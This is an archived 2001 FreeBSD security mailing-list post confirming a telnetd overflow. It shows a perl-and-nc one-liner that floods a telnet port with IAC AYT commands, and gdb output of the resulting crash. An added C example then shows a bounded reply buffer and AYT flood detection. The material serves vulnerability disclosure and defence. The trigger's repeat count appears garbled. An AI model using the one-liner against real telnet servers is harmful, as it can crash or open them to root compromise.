From: Przemyslaw Frasunek (venglin@freebsd.lublin.pl)
Date: Thu Jul 19 2001 - 04:03:53 CDT


    > Posted to bugtraq is a notice about telnetd being remotely root
    > exploitable. Does anyone know if it is true?

    Yes, telnetd is vulnerable.

    lagoon:venglin:~> perl -e '$c=sprintf("%c%c", 255, 246); sleep 10; print $c
    x0 . "\r\n"' | nc localhost 23

    (gdb) att 9024
    Attaching to process 9024
    0x28230f90 in ?? ()
    (gdb) cont
    Continuing.

    Program received signal SIGSEGV, Segmentation fault.
    0x5d736559 in ?? ()
    (gdb) bt
    #0 0x5d736559 in ?? ()
    #1 0x804e9d9 in ?? ()
    #2 0x804d1a1 in ?? ()
    #3 0x804d6d1 in ?? ()
    #4 0x804d14d in ?? ()
    #5 0x8049bd3 in ?? ()

    The strange %eip value is:

    riget:root:/# perl -e 'printf("%c%c%c%c\n", 0x59, 0x65, 0x73, 0x5d)'
    Yes]

    "\r\n[Yes]\r\n" is the response to the IAC AYT command string.

    --
    * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
    * Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *
    

    To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
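The crash above, with %eip holding the bytes of "Yes]", points at a reply buffer that accumulates "\r\n[Yes]\r\n" strings for each AYT without checking how much room is left. The following is an added example, not code from the post or from any telnetd source: a minimal C handler for a raw telnet input stream that answers IAC AYT into a fixed-size reply buffer, refuses any reply that would not fit, and counts AYT commands per read so a flood can be flagged. The names (`outbuf`, `process_telnet_input`, `run_ayt_flood`, `AYT_FLOOD_THRESHOLD`), the 64-byte buffer and the threshold of 16 are all constructed for the illustration.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define IAC 255   /* "interpret as command" escape byte */
#define AYT 246   /* "are you there" command */

/* Deliberately small reply buffer so the full condition is reached quickly
 * in the demonstration (constructed size, not a real server's). */
#define OUTBUF_CAP 64
/* Constructed threshold: more AYTs than this in one read is treated as a flood. */
#define AYT_FLOOD_THRESHOLD 16

struct outbuf {
    char data[OUTBUF_CAP];
    size_t len;       /* bytes queued for sending */
    size_t dropped;   /* reply bytes refused because they would not fit */
};

/* Append a reply only when it fits completely. Without this check each
 * "\r\n[Yes]\r\n" written for an AYT would run past the end of data[]. */
static int outbuf_append(struct outbuf *ob, const char *s, size_t n)
{
    if (n > OUTBUF_CAP - ob->len) {
        ob->dropped += n;
        return 0;
    }
    memcpy(ob->data + ob->len, s, n);
    ob->len += n;
    return 1;
}

/* Scan a raw telnet input stream, answer every IAC AYT, and return the
 * number of AYT commands seen. IAC IAC is an escaped 0xff data byte. */
size_t process_telnet_input(const unsigned char *in, size_t inlen, struct outbuf *ob)
{
    static const char ayt_reply[] = "\r\n[Yes]\r\n";   /* 9 bytes */
    size_t ayts = 0;
    for (size_t i = 0; i < inlen; i++) {
        if (in[i] != IAC)
            continue;                     /* ordinary data byte */
        if (i + 1 >= inlen)
            break;                        /* IAC at end of read: wait for more */
        unsigned char cmd = in[++i];
        if (cmd == IAC)
            continue;                     /* escaped data byte, not a command */
        if (cmd == AYT) {
            ayts++;
            outbuf_append(ob, ayt_reply, sizeof ayt_reply - 1);
        }
        /* Other commands (DO/DONT/WILL/WONT/SB ...) are ignored here. */
    }
    return ayts;
}

/* Simple per-read flood indicator for logging or alerting. */
int ayt_flood_suspected(size_t ayts)
{
    return ayts > AYT_FLOOD_THRESHOLD;
}

/* Count AYTs in a buffer, discarding the replies. */
size_t count_ayts(const unsigned char *in, size_t inlen)
{
    struct outbuf ob = {{0}, 0, 0};
    return process_telnet_input(in, inlen, &ob);
}

struct flood_result { size_t ayts; size_t out_len; size_t dropped; };

/* Constructed input: `count` back-to-back IAC AYT pairs, the pattern the
 * perl one-liner in the post sends, run through the bounded handler. */
struct flood_result run_ayt_flood(size_t count)
{
    unsigned char in[4096];
    struct outbuf ob = {{0}, 0, 0};
    struct flood_result r = {0, 0, 0};
    if (count > sizeof in / 2)
        count = sizeof in / 2;
    for (size_t i = 0; i < count; i++) {
        in[2 * i] = IAC;
        in[2 * i + 1] = AYT;
    }
    r.ayts = process_telnet_input(in, 2 * count, &ob);
    r.out_len = ob.len;
    r.dropped = ob.dropped;
    return r;
}

int main(void)
{
    struct flood_result r = run_ayt_flood(100);
    printf("AYTs seen: %zu, queued %zu bytes, dropped %zu bytes, flood=%d\n",
           r.ayts, r.out_len, r.dropped, ayt_flood_suspected(r.ayts));
    return 0;
}
```

With 100 AYTs in one read, seven 9-byte replies fit in the 64-byte buffer (63 bytes) and the remaining 93 are refused rather than written past the end; a real server would flush the buffer and continue instead of dropping, but the decision to refuse the write is the same. The per-read AYT count is what a defender would log: a client that sends hundreds of AYTs in a single read has no legitimate reason to.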